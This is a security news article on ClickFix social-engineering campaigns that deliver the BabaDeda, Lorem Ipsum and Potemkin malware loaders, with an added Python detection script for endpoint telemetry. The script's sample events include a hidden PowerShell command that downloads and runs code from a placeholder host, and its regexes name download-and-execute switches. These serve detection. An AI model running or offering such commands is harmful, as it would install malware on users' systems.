ClickFix Campaigns Unleash a Trio of Stealthy Malware Loaders
Recent cybersecurity reports highlight a surge in 'ClickFix' social engineering campaigns, deploying three distinct and sophisticated malware loaders: **BabaDeda Loader**, **Lorem Ipsum Loader**, and **Potemkin**. These campaigns leverage deceptive tactics to trick users into executing malicious commands, ultimately leading to the deployment of information stealers and remote access trojans (RATs) across various sectors.
Cybersecurity researchers are sounding the alarm over multiple **ClickFix** campaigns, which are actively distributing three distinct malware loaders: **BabaDeda Loader**, **Lorem Ipsum Loader**, and **Potemkin**. Independent analyses from **Morphisec**, **BlueVoyant**, and **Huntress** detail the evolving tactics and advanced capabilities of these threats.

### BabaDeda Loader Targets Education and Finance
**BabaDeda Loader** campaigns, observed in April 2026, have specifically targeted organizations in the education and financial sectors. **Morphisec** researcher Shmuel Uzan noted, "Earlier BabaDeda activity was known for concealing malicious payloads inside legitimate looking installer packages. This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility."
These attacks initiate with a **ClickFix** social engineering ploy, coercing users into running attacker-supplied PowerShell commands. The loader then deploys information stealers and RATs by combining techniques such as hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage.
The activity is linked to **BabaDeda**, a crypter service first documented by **Morphisec** in November 2021 for its role in targeting cryptocurrency and Web3 sectors with information stealers, RATs, and **LockBit** ransomware.
The loader is designed to profile the host, avoid Russian or Belarusian systems, and perform security product checks before retrieving and injecting its main payload into trusted Windows processes like `svchost.exe`.
One of the malware families delivered by **BabaDeda Loader** is a .NET backdoor and information stealer with extensive capabilities, including:
* Collecting detailed system information
* Discovering installed browser profiles and extracting artifacts (cookies, history, credentials)
* Traversing directories and exfiltrating file contents
* Capturing screenshots and displaying information
* Executing shell commands or external processes
* Transferring data to a command-and-control (C2) server
* Utilizing native Windows APIs for process interaction, memory operations, and DPAPI access
Another attack chain involves a ZIP archive that uses DLL side-loading to launch **DanaBot** and **SectopRAT** (also known as **ArechClient**). These attacks are characterized by a staged loader component called **Storage Crypter**, which reads payload material from external storage files such as `List.Control.dat`.

**Morphisec** highlights the stealth of this approach: "The visible application package appears legitimate, while malicious payloads remain hidden inside externally stored containers and are decoded only moments before execution. This design minimizes forensic visibility, complicates automated analysis, and reduces opportunities for traditional security tools to identify malicious activity before execution occurs."
These findings underscore the evolution of modern loader frameworks, which are becoming increasingly modular, separating delivery, storage, execution, and payload deployment into distinct components.
### ClickFix Chain Drops Lorem Ipsum Loader
The **ClickFix** technique is also being exploited in a campaign that leverages at least five compromised **WordPress** sites as initial access points to deliver the nascent **Lorem Ipsum Loader** and backdoor. These hacked websites span architecture, legal services, and construction technology sectors.
This marks a shift from previous opportunistic campaigns that used trojanized **Microsoft Teams** installers via fake download portals. The loader is believed to have been active since February 2026.
**BlueVoyant** researchers Thomas Elkins and Joshua Green stated, "The pivot to ClickFix lures hosted on compromised WordPress (WP) sites significantly broadens the potential victim pool and demonstrates the operators' willingness to rapidly adapt their initial access techniques."
This change in delivery mechanism is attributed to **Microsoft's** recent disruption of **Fox Tempest** (also known as **Forging Marauder**), a threat actor that offered a malware-signing-as-a-service (MSaaS) operation. The loss of fraudulently signed **Microsoft Trusted Signing** certificates forced operators to adopt a delivery model that bypasses code signing entirely.

The threat activity cluster is confidently attributed to **Vanilla Tempest** (also known as **Rapid Brigantine**, **Vice Society**, and **Vice Spider**), a financially motivated threat actor known for deploying ransomware families such as **Rhysida**, **BlackCat**, **Zeppelin**, and **Quantum Locker**.
Attack sequences distributing **Lorem Ipsum Loader** utilize **ClickFix**-style **Edge** web browser security update lures. These lures prompt users to run a malicious command that downloads a ZIP file and an outdated version of **Node.js** (version 7.10.1 from 2017) to execute JavaScript-based payloads, minimizing detection risks.
The JavaScript payload acts as a dropper, deploying and executing additional malware components, including a batch script that establishes persistence by initiating a DLL side-loading chain. This chain executes a malicious DLL (`mscoree.dll` or `msvcp140.dll`), which then decodes the embedded **Lorem Ipsum Loader** payload.
**BlueVoyant** explained, "The Lorem Ipsum Loader is designed to retrieve the next-stage Lorem Ipsum Backdoor from C2 infrastructure obtained from attacker-controlled profiles hosted on social networking platforms." This backdoor then executes further payloads from the C2 server, ultimately leading to **Rapid Brigantine's** established post-exploitation tooling and ransomware deployments, primarily **Rhysida**.
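The two delivery chains above share observable host-side traits: a ClickFix lure has the victim launch PowerShell from the shell with window-hiding or download flags (the BabaDeda chain), a dropped `node.exe` runs a script from a user-writable directory (the Lorem Ipsum chain), and a trusted-looking executable loads an unsigned copy of `mscoree.dll` or `msvcp140.dll` from outside the Windows or Program Files trees (both chains' DLL side-loading step). The following is an added example, not code from the article or from Morphisec, BlueVoyant or Huntress, of rule-based triage over constructed process-creation and image-load records; the field names loosely follow Sysmon Event ID 1 and 7 and the sample events, paths and URL are invented for the example.

```python
"""Added example: triage of constructed endpoint telemetry for the ClickFix
delivery patterns described above. Field names loosely follow Sysmon
Event ID 1 (ProcessCreate) and Event ID 7 (ImageLoad); all sample
records are constructed and are not vendor data."""
import re
from typing import Dict, List, Tuple

# Directories a standard user can write to; a dropper staging node.exe or a
# side-load DLL usually lives here rather than under a protected tree.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|Temp|ProgramData)\\", re.I)
# Protected trees where the genuine mscoree.dll / msvcp140.dll normally reside.
SYSTEM_DIRS = re.compile(r"^C:\\(Windows|Program Files( \(x86\))?)\\", re.I)
# DLL names the article reports being side-loaded in the Lorem Ipsum chain.
SIDELOAD_NAMES = {"mscoree.dll", "msvcp140.dll"}
# PowerShell switches and cmdlets typical of pasted ClickFix one-liners:
# hidden window, encoded command, or download-and-evaluate.
CLICKFIX_PS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s|\biex\b|"
    r"invoke-expression|downloadstring|\biwr\b|invoke-webrequest", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage_process(ev: Dict[str, str]) -> List[str]:
    """Return the names of rules matching one ProcessCreate record."""
    hits: List[str] = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Rule 1: a pasted ClickFix command runs from the shell (explorer.exe)
    # rather than from an installer or script host, and carries the
    # hide/encode/download switches the lure text supplies.
    if (image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
            and CLICKFIX_PS.search(cmd)):
        hits.append("clickfix_hidden_powershell")
    # Rule 2: the Lorem Ipsum chain executes JavaScript with a dropped
    # node.exe; a Node runtime in a user-writable path running a .js file
    # is rare in managed fleets.
    if (image == "node.exe" and USER_WRITABLE.search(ev.get("Image", ""))
            and re.search(r"\.js\b", cmd, re.I)):
        hits.append("nodejs_dropper_from_user_path")
    return hits


def triage_image_load(ev: Dict[str, str]) -> List[str]:
    """Return the names of rules matching one ImageLoad record."""
    hits: List[str] = []
    loaded = ev.get("ImageLoaded", "")
    # Rule 3: a DLL named like a runtime library, loaded from outside the
    # protected trees and not Microsoft-signed, is a side-load candidate.
    if (basename(loaded) in SIDELOAD_NAMES and not SYSTEM_DIRS.match(loaded)
            and ev.get("Signed", "false").lower() != "true"):
        hits.append("dll_sideload_candidate")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run every record through the matching triage function."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        rules = (triage_image_load(ev) if ev.get("EventType") == "ImageLoad"
                 else triage_process(ev))
        findings.extend((r, basename(ev.get("Image", ""))) for r in rules)
    return findings


# Constructed sample telemetry: one record per pattern plus two benign
# look-alikes (an interactive admin PowerShell and a signed msvcp140.dll
# shipped by a legitimately installed application).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/s)"'},
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\node\node.exe",
     "CommandLine": r"node.exe C:\Users\alice\AppData\Local\Temp\update.js"},
    {"EventType": "ImageLoad", "Image": r"C:\Users\alice\AppData\Roaming\Edge\update.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\Edge\msvcp140.dll", "Signed": "false"},
    {"EventType": "ImageLoad", "Image": r"C:\Program Files\Foo\foo.exe",
     "ImageLoaded": r"C:\Program Files\Foo\msvcp140.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:32s} {image}")
```

Rule 3 keys on the signature flag rather than the file name alone because `msvcp140.dll` is legitimately redistributed next to many applications; without that check the rule would page on every Visual C++ runtime copy. The hidden-window and encoded-command switches in rule 1 are the part of the lure the victim cannot see, so they separate a pasted ClickFix command from an administrator's interactive session even when both are parented by `explorer.exe`.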
### Potemkin, RMMProject, and EtherRAT Delivered via ClickFix
The third significant campaign relying on **ClickFix** is a sophisticated attack chain that installs an MSI package. This package then drops a previously undocumented loader, codenamed **Potemkin**, via an HTML Application (HTA) payload. **Potemkin** serves as a conduit for **EtherRAT** and **RMMProject**, a Lua-scriptable DLL with modules for remote screen control and browser credential theft.